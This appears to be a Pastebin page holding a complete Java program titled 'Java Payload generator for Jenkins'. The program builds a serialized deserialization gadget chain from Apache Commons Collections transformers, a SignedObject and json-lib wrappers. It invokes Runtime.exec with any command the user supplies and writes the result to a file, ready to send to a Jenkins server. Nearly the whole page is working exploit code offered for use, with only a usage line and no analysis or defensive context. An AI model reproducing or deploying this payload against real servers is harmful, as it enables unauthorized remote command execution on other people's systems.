API tools faq
paste
Advertisement
Guest User

Java Payload generator for Jenkins

a guest
Jun 14th, 2017
388
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 5.98 KB | None | 0 0
raw download clone embed print report
  1. import java.io.FileOutputStream;
  2. import java.io.ObjectOutputStream;
  3. import java.io.ObjectStreamException;
  4. import java.io.Serializable;
  5. import java.lang.reflect.Field;
  6. import java.security.KeyPair;
  7. import java.security.KeyPairGenerator;
  8. import java.security.PrivateKey;
  9. import java.security.PublicKey;
  10. import java.security.Signature;
  11. import java.security.SignedObject;
  12. import java.util.Comparator;
  13. import java.util.HashMap;
  14. import java.util.HashSet;
  15. import java.util.Map;
  16. import java.util.concurrent.ConcurrentSkipListSet;
  17. import java.util.concurrent.CopyOnWriteArraySet;
  18.  
  19. import net.sf.json.JSONArray;
  20.  
  21. import org.apache.commons.collections.Transformer;
  22. import org.apache.commons.collections.collection.AbstractCollectionDecorator;
  23. import org.apache.commons.collections.functors.ChainedTransformer;
  24. import org.apache.commons.collections.functors.ConstantTransformer;
  25. import org.apache.commons.collections.functors.InvokerTransformer;
  26. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  27. import org.apache.commons.collections.map.LazyMap;
  28. import org.apache.commons.collections.map.ReferenceMap;
  29. import org.apache.commons.collections.set.ListOrderedSet;
  30.  
  31. public class Payload implements Serializable {
  32.  
  33.     private Serializable payload;
  34.  
  35.     public Payload(String cmd) throws Exception {
  36.  
  37.         this.payload = this.setup(cmd);
  38.  
  39.     }
  40.  
  41.     public Serializable setup(String cmd) throws Exception {
  42.         final String[] execArgs = new String[] { cmd };
  43.  
  44.         final Transformer[] transformers = new Transformer[] {
  45.                 new ConstantTransformer(Runtime.class),
  46.                 new InvokerTransformer("getMethod", new Class[] { String.class,
  47.                         Class[].class }, new Object[] { "getRuntime",
  48.                         new Class[0] }),
  49.                 new InvokerTransformer("invoke", new Class[] { Object.class,
  50.                         Object[].class }, new Object[] { null, new Object[0] }),
  51.                 new InvokerTransformer("exec", new Class[] { String.class },
  52.                         execArgs), new ConstantTransformer(1) };
  53.  
  54.         Transformer transformerChain = new ChainedTransformer(transformers);
  55.  
  56.         final Map innerMap = new HashMap();
  57.  
  58.         final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
  59.  
  60.         TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
  61.  
  62.         HashSet map = new HashSet(1);
  63.         map.add("foo");
  64.         Field f = null;
  65.         try {
  66.             f = HashSet.class.getDeclaredField("map");
  67.         } catch (NoSuchFieldException e) {
  68.             f = HashSet.class.getDeclaredField("backingMap");
  69.         }
  70.  
  71.         f.setAccessible(true);
  72.         HashMap innimpl = (HashMap) f.get(map);
  73.  
  74.         Field f2 = null;
  75.         try {
  76.             f2 = HashMap.class.getDeclaredField("table");
  77.         } catch (NoSuchFieldException e) {
  78.             f2 = HashMap.class.getDeclaredField("elementData");
  79.         }
  80.  
  81.         f2.setAccessible(true);
  82.         Object[] array2 = (Object[]) f2.get(innimpl);
  83.  
  84.         Object node = array2[0];
  85.         if (node == null) {
  86.             node = array2[1];
  87.         }
  88.  
  89.         Field keyField = null;
  90.         try {
  91.             keyField = node.getClass().getDeclaredField("key");
  92.         } catch (Exception e) {
  93.             keyField = Class.forName("java.util.MapEntry").getDeclaredField(
  94.                     "key");
  95.         }
  96.  
  97.         keyField.setAccessible(true);
  98.         keyField.set(node, entry);
  99.  
  100.         KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
  101.         keyPairGenerator.initialize(1024);
  102.         KeyPair keyPair = keyPairGenerator.genKeyPair();
  103.         PrivateKey privateKey = keyPair.getPrivate();
  104.         PublicKey publicKey = keyPair.getPublic();
  105.  
  106.         Signature signature = Signature.getInstance(privateKey.getAlgorithm());
  107.         SignedObject payload = new SignedObject(map, privateKey, signature);
  108.         JSONArray array = new JSONArray();
  109.  
  110.         array.add("asdf");
  111.  
  112.         ListOrderedSet set = new ListOrderedSet();
  113.         Field f1 = AbstractCollectionDecorator.class
  114.                 .getDeclaredField("collection");
  115.         f1.setAccessible(true);
  116.         f1.set(set, array);
  117.  
  118.         DummyComperator comp = new DummyComperator();
  119.         ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
  120.         csls.add(payload);
  121.  
  122.         CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
  123.         CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
  124.  
  125.         a1.add(set);
  126.         Container c = new Container(csls);
  127.         a1.add(c);
  128.  
  129.         a2.add(csls);
  130.         a2.add(set);
  131.  
  132.         ReferenceMap flat3map = new ReferenceMap();
  133.         flat3map.put(new Container(a1), "asdf");
  134.         flat3map.put(new Container(a2), "asdf");
  135.  
  136.         return flat3map;
  137.     }
  138.  
  139.     private Object writeReplace() throws ObjectStreamException {
  140.         return this.payload;
  141.     }
  142.  
  143.     static class Container implements Serializable {
  144.  
  145.         private Object o;
  146.  
  147.         public Container(Object o) {
  148.             this.o = o;
  149.         }
  150.  
  151.         private Object writeReplace() throws ObjectStreamException {
  152.             return o;
  153.         }
  154.  
  155.     }
  156.  
  157.     static class DummyComperator implements Comparator, Serializable {
  158.  
  159.         public int compare(Object arg0, Object arg1) {
  160.             // TODO Auto-generated method stub
  161.             return 0;
  162.         }
  163.  
  164.         private Object writeReplace() throws ObjectStreamException {
  165.             return null;
  166.         }
  167.  
  168.     }
  169.  
  170.     public static void main(String args[]) throws Exception{
  171.  
  172.         if(args.length != 2){
  173.             System.out.println("java -jar payload.jar outfile cmd");
  174.             System.exit(0);
  175.         }
  176.  
  177.         String cmd = args[1];
  178.         FileOutputStream out = new FileOutputStream(args[0]);
  179.  
  180.         Payload pwn = new Payload(cmd);
  181.         ObjectOutputStream oos = new ObjectOutputStream(out);
  182.         oos.writeObject(pwn);
  183.         oos.flush();
  184.         out.flush();
  185.  
  186.  
  187.     }
  188.  
  189. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!